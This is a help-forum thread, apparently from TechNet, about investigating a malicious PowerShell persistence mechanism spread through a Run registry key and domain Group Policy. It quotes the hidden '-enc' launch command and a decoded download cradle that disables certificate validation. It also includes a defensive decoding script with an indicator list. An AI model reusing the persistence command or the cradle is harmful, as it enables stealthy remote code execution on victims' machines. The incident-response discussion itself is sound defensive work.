Suspicious Powershell Activity

  • Question

  • Hello,

    We've found a powershell process that recently has started launching when a user logs in, and it appears to be communicating with an outside IP address - not associated with our company at all.  I haven't been able to find the source for this besides two entries in the registry that keep reappearing.

    The registry keys are as follows:

    In HKLM/Software/Microsoft/Windows/CurrentVersion/Run:

    PowerShellAD - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc $x"

    In HKLM/Software/Microsoft/Windows/CurrentVersion:


    Below is a screenshot of the processes that start when logging in:

    Powershell processes

    For the time being, we've put in place a rule to prevent Powershell from running, but we need help finding the source of this and removing it.

    So far, virus scans and root-kit scans are not finding anything, but we're also preventing this from running so it may not find anything.

    Any help would be appreciated.

    Thank you,


    20/Shawwal/1437 03:03 PM

All replies

  • after decoding and decompressing the encoded string, one gets to a command which downloads a further script:

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    (New-Object Net.WebClient).DownloadString('')

    the resulting script seems to be based on PowerSploit

    20/Shawwal/1437 07:53 PM
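The decoding step the reply above describes can be done without ever executing the payload. The script below is an added example, not code from the thread; it assumes the encoded blob sits where the question says (value ComputerID under HKLM:\Software\Microsoft\Windows\CurrentVersion), that any nested blob is Deflate-compressed, and the indicator list is my own choice.

```powershell
# Added example: decode (never run) a "powershell -enc" payload and report
# download-cradle indicators. Registry locations are taken from the thread.

function Expand-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    # -enc / -EncodedCommand carries base64 of a UTF-16LE script
    $script = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
    # Droppers often nest a second, compressed base64 blob; try to inflate each
    # candidate (assumption: Deflate, as the reply mentions "decompressing")
    foreach ($m in [regex]::Matches($script, '[A-Za-z0-9+/]{40,}={0,2}')) {
        try {
            $ms = New-Object IO.MemoryStream(,[Convert]::FromBase64String($m.Value))
            $ds = New-Object IO.Compression.DeflateStream($ms, [IO.Compression.CompressionMode]::Decompress)
            $sr = New-Object IO.StreamReader($ds)
            $script += "`n--- inflated inner blob ---`n" + $sr.ReadToEnd()
        } catch { }  # not a compressed blob; ignore
    }
    return $script
}

function Get-DownloadCradleIndicators {
    param([Parameter(Mandatory)][string]$Script)
    $indicators = 'DownloadString', 'DownloadFile', 'ServerCertificateValidationCallback',
                  'Net.WebClient', 'IEX', 'Invoke-Expression', 'FromBase64String', 'DeflateStream'
    $indicators | Where-Object { $Script -match [regex]::Escape($_) }
}

# Offline check with a constructed, harmless sample (not a real payload)
$sample = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/x')"))
"Sample decodes to: " + (Expand-EncodedCommand $sample)
"Sample indicators: " + ((Get-DownloadCradleIndicators (Expand-EncodedCommand $sample)) -join ', ')

# Live check: Run entries invoking -enc, plus the ComputerID value named in the thread
$run = Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
$run.PSObject.Properties | Where-Object { $_.Value -match 'powershell.*-enc' } |
    ForEach-Object { "Suspicious Run entry {0}: {1}" -f $_.Name, $_.Value }
$cid = (Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion' -ErrorAction SilentlyContinue).ComputerID
if ($cid) {
    $decoded = Expand-EncodedCommand $cid
    "Decoded ComputerID payload:`n$decoded"
    "Indicators: " + ((Get-DownloadCradleIndicators $decoded) -join ', ')
}
```

Reading HKLM needs no elevation, so this can be run on each suspect host to see what the scheduled command really does before deciding whether to rebuild it.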
  • OK.  That makes sense since the initial tasks that are started have the web address string in the command line within Task Manager.

    Any idea where this may be downloading the scripts, or where I need to search next for possible infection?



    20/Shawwal/1437 07:57 PM
  • what do you mean "where this may be downloading the scripts"?
    It is run via the registry key you found, which you should delete.
    It is downloading from the ip address
    The original vector/dropper might have been via browser or email.

    I for myself would nuke from orbit ( = reinstall Windows), but you could contact someone at

    20/Shawwal/1437 08:58 PM
  • Unfortunately, when I delete this reg key from my PC, it gets reapplied within a few hours.  I need to find the source PC first before I nuke anything.

    I'll post at to see if they can help with how to track down the source (and hopefully prevent more!)

    Thanks for the help.


    21/Shawwal/1437 11:21 AM
  • We are looking forward to your good news:)

    Please mark the reply as an answer if you find it is helpful.

    If you have feedback for TechNet Support, contact

    22/Shawwal/1437 09:44 AM
  • So mystery is somewhat solved.  I traced it down to a powershell command that was placed in our default domain group policy.  I removed this entry and it seems to be slowly removing itself from the network.

    The next thing to figure out now is where this came from.  There are only three people at our company with the domain password and none of us put that there.  

    The task that was running in the group policy, said it was created by domain\administrator so we are a bit perplexed over this one.  Any ideas on how to trace this part of it?




    02/Dhu al-Qa'dah/1437 07:53 PM